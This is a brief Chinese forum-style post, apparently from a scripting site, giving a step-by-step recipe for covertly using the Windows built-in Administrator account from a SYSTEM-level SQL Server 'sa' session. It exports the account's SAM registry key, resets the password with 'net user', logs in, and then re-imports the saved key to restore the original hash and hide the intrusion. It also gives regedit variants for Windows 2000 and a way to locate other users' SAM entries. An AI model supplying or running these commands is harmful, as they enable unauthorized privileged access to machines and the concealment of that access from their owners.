sa默认是SYSTEM权限,可以读sam键.
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\trace.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\trace.reg
这样就不用克隆,用管理员帐户即可.
2.
如果没用默认的administrator,可以用下面的方法找到对应的sid.
regedit /e c:\test.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\用户名
3.
2000系统不存在REG,用Regedit更具有通用性
regedit /e c:\trace.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
regedit要写完整路径,不可以用HKLM代替HKEY_LOCAL_MACHINE
完事后用regedit /s c:\trace.reg恢复原来的键值。
文章评论
共有 位脚本之家网友发表了评论我来说两句